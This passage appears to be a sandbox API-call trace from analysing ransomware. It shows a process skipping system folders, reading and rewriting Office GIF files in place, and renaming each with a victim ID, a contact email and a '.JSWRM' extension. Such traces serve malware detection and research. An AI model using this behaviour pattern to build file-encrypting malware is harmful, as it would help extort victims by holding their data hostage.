"c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir40f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0119.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.531] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d5b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR41F.GIF", cAlternateFileName="")) returned 1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2=".") returned 1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="..") returned 1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="...") returned 1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="windows") returned -1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="recovery") returned -1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="perflogs") returned -1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="documents and settings") returned 1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="system volume information") returned -1 [0119.531] lstrcmpiW (lpString1="PDIR41F.GIF", lpString2="msocache") returned 1 [0119.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR41F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR41F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR41F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR41F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR41F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR41F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR41F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir41f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.532] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=32091) returned 1 [0119.532] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7d50) returned 0x24e1d8 [0119.532] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x7d50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x7d50, lpOverlapped=0x0) returned 1 [0119.545] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.545] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x7d50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x7d50, lpOverlapped=0x0) returned 1 [0119.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.546] CloseHandle (hObject=0x314) returned 1 [0119.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0119.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0119.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0119.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.546] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR41F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir41f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR41F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir41f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0119.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.547] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdf73, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR42F.GIF", cAlternateFileName="")) returned 1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2=".") returned 1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="..") returned 1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="...") returned 1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="windows") returned -1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="recovery") returned -1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="perflogs") returned -1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="documents and settings") returned 1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="system volume information") returned -1 [0119.547] lstrcmpiW (lpString1="PDIR42F.GIF", lpString2="msocache") returned 1 [0119.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0119.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR42F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR42F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR42F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0119.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR42F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR42F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR42F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR42F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir42f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.548] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=57203) returned 1 [0119.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdf70) returned 0x24e1d8 [0119.548] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xdf70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xdf70, lpOverlapped=0x0) returned 1 [0119.553] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.553] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xdf70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xdf70, lpOverlapped=0x0) returned 1 [0119.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.554] CloseHandle (hObject=0x314) returned 1 [0119.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0119.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0119.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0119.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.554] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR42F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir42f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR42F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir42f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0119.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.555] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd2c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR43B.GIF", cAlternateFileName="")) returned 1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2=".") returned 1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="..") returned 1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="...") returned 1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="windows") returned -1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="recovery") returned -1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="perflogs") returned -1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="documents and settings") returned 1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="system volume information") returned -1 [0119.555] lstrcmpiW (lpString1="PDIR43B.GIF", lpString2="msocache") returned 1 [0119.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0119.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR43B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0119.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0119.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR43B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0119.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0119.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.556] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3372) returned 1 [0119.556] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd20) returned 0x24e1d8 [0119.556] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xd20, lpOverlapped=0x0) returned 1 [0119.579] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.580] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xd20, lpOverlapped=0x0) returned 1 [0119.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.580] CloseHandle (hObject=0x314) returned 1 [0119.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0119.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0119.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.580] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0119.582] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa5e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR43F.GIF", cAlternateFileName="")) returned 1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2=".") returned 1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="..") returned 1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="...") returned 1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="windows") returned -1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="recovery") returned -1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="perflogs") returned -1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="documents and settings") returned 1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="system volume information") returned -1 [0119.582] lstrcmpiW (lpString1="PDIR43F.GIF", lpString2="msocache") returned 1 [0119.582] RtlAllocateHeap 